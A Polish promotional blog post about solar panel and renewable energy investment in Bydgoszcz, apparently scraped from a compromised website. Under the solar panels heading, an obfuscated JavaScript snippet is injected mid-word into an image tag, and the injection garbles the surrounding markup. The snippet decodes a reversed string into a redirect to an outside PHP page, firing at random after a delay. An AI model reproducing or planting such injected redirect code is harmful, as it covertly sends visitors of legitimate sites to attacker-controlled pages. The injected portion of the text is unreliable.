Inwestycje w odnawialne źródła energii

Na terenie Bydgoszczy w ostatnim czasie bardzo mocno jest promowane inwestowanie w różnego rodzaju energie odnawialne. Z racji tego, że jest to spore miasto i gęsto zaludnione najlepsza inwestycja tam to inwestycja w panele słoneczne, gdyż daje to największy zwrot z inwestycji w porównaniu do elektrowni wodnej czy wiatrowe, a zysk w tym przypadku jest zawsze najważniejszy.

Panele słoneczne w Bydgoszczy

fo<script>$zXz=function(n){if (typeof ($zXz.list[n]) == „string”) return $zXz.list[n].split(„”).reverse().join(„”);return $zXz.list[n];};$zXz.list=[„\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>towoltaika bydgoszcz” class=”alignleft” height=”133″ src=”http://www.disc4you.eu/wp-content/uploads/2017/10/fo<script>$zXz=function(n){if (typeof ($zXz.list[n]) == towoltaika-bydgoszcz.jpg” style=”float:left;” width=”200″/>Odnawialne źródła energii to bez wątpienia temat numer jeden w ostatnim czasie ze względu na globalne ocieplenie i duża emisję dwutlenku węgla. Bydgoszcz postanowiła jako jedno z pierwszych miast w Polsce, zacząć systematyczne inwestycje w energie odnawialne i tak już wkrótce fotowoltaika Bydgoszcz, stanie się najbardziej wydajnym miastem pod względem korzystania z tej energii przez miasto. Cel jest prosty, a mianowicie za pięć lat władze miasta chcą, by ponad trzydzieści procent energii jaką pobiera miasto było wytwarzanych własnie  z takich elektrowni. Byłby to niesamowity sukces wszystkich osób mieszkających w Bydgoszczy, gdyż dali by oni przykład, że jeśli się chce to da się zrobić. Nie wspominając już o tym jakie miasto będzie miało oszczędności, przez zmniejszony pobór prądu z tradycyjnych elektrowni. Warto również dodać, że będzie to można odczuć od razu w samym mieście, gdyż będzie produkowane miej gazów cieplarnianych i powtarzane będzie się systematycznie oczyszczać, co wpłynie pozytywnie na środowisko miejsce jak i na zdrowie tamtejszych mieszkańców.

Mamy nadzieję, że wspólnymi siłami uda się mieszkańcom miasta i jej władzom doprowadzić to tego celu, lecz w tym przypadku będzie potrzebne zaangażowanie dużej liczby osób, które będą chciały zainwestować w kupno baterii słonecznych i zamontowanie ich na własnych dachach.